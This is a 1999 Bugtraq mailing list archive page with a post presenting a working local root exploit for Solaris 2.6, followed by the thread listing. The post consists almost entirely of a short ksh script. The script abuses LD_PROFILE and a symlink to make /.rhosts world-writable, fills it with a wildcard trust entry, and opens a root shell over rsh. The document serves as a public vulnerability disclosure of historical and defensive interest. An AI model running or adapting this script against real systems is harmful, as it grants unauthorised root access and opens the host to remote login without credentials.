Bugtraq mailing list archives

LD_PROFILE local root exploit for solaris 2.6

From: steve () TIGHTROPE DEMON CO UK (Steve Mynott)
Date: Wed, 22 Sep 1999 21:14:40 +0000


works on solaris 2.6 sparc anyway...

#! /bin/ksh
#  LD_PROFILE local root exploit for solaris
#  steve () tightrope demon co uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + >  /.rhosts
rsh -l root localhost csh -i

--
1024/D9C69DF9 steve mynott steve () tightrope demon co uk http://www.pineal.com/

    those who do not understand unix are condemned to reinvent it, poorly.
        -- henry spencer

Current thread:

BT/Cellnet Genie vulnerability James Fidell (Sep 15)
- Re: BT/Cellnet Genie vulnerability James Fidell (Sep 15)
- Vulnerability in dtaction on Digital Unix Zack Hubert (Sep 16)
  - Re: Vulnerability in dtaction on Digital Unix Eric Gatenby (Sep 16)
    - Nmap and Cisco Dos, clarification -- Lancashire, Andrew (Sep 22)
    - Re: Nmap and Cisco Dos, clarification -- Darren Reed (Sep 23)
    - LD_PROFILE local root exploit for solaris 2.6 Steve Mynott (Sep 22)
    - Re: LD_PROFILE local root exploit for solaris 2.6 Brock Sides (Sep 23)
    - Re: LD_PROFILE local root exploit for solaris 2.6 Erik Fichtner (Sep 23)
    - Announcing Second Annual TooRcon Computer Security Expo Ben (Sep 25)
    - Re: LD_PROFILE local root exploit for solaris 2.6 Casper Dik (Sep 24)
    - Re: LD_PROFILE local root exploit for solaris 2.6 Eric Daniel (Sep 28)
    - Re: LD_PROFILE local root exploit for solaris 2.6 Pavel Kankovsky (Sep 24)
    - Re: Vulnerability in dtaction on Digital Unix Dave Dittrich (Sep 22)
- ASUS mother board security question... Bob (Sep 16)
  - Re: ASUS mother board security question... Alan Cox (Sep 16)
    - Re: ASUS mother board security question... Nick FitzGerald (Sep 25)